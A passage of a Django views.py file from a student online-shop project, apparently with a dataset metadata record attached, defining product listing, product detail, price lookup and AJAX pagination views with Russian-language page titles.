paginator.page(paginator.num_pages)\n\n content = {\n 'title': title,\n 'links_menu': links_menu,\n 'main_menu': main_menu,\n 'products': products_paginator,\n 'category': category,\n }\n return render(request, 'mainapp/products_list.html', content)\n\n hot_product = get_hot_product()\n same_products = get_same_products(hot_product)\n\n # same_products = Product.objects.all()[:5]\n\n content = {\n 'title': title,\n 'links_menu': links_menu,\n 'main_menu': main_menu,\n 'same_products': same_products,\n 'hot_product': hot_product,\n }\n return render(request, 'mainapp/products.html', content)\n\n\ndef contact(request):\n content = {\n 'title': 'Контакты',\n 'main_menu': main_menu\n }\n return render(request, 'mainapp/contact.html', content)\n\n\ndef context(request):\n content = {\n 'title': 'магазин',\n 'header': 'Доброго времени суток',\n 'username': 'Ларина Е.В.',\n 'products': [\n {'name': 'Стулья', 'price': 4545},\n {'name': 'Диваны', 'price': 9545},\n {'name': 'Кровати', 'price': 9999},\n ]\n }\n\n return render(request, 'mainapp/test_context.html', content)\n\n\n@never_cache\ndef product(request, pk):\n title = 'Продукты'\n\n content = {\n 'title': title,\n 'links_menu': ProductCategory.objects.all(),\n 'product': get_object_or_404(Product, pk=pk),\n 'basket': get_basket(request.user),\n\n }\n\n return render(request, 'mainapp/product.html', content)\n\n\ndef product_price(request, pk):\n products = Product.objects.filter(pk=pk)\n\n if products:\n return JsonResponse({'price': products[0].price})\n else:\n return JsonResponse({'price': 0})\n\n\ndef products_ajax(request, pk=None, page=1):\n if request.is_ajax():\n links_menu = get_links_menu()\n print('Cработал', type(pk))\n if pk is not None:\n if pk == 0:\n category = {\n 'pk': 0,\n 'name': 'все'\n }\n print('ПК = 0')\n products = get_products_orederd_by_price()\n else:\n category = get_category(pk)\n products = get_products_in_category_orederd_by_price(pk)\n\n paginator = Paginator(products, 3)\n try:\n products_paginator = paginator.page(page)\n except PageNotAnInteger:\n products_paginator = paginator.page(1)\n except EmptyPage:\n products_paginator = paginator.page(paginator.num_pages)\n\n content = {\n 'links_menu': links_menu,\n 'category': category,\n 'products': products_paginator,\n }\n\n result = render_to_string(\n 'includes/inc_products_list_content.html',\n context=content,\n request=request)\n return JsonResponse({'result': result})\n","repo_name":"LarinAlexei/geekshop-server2","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}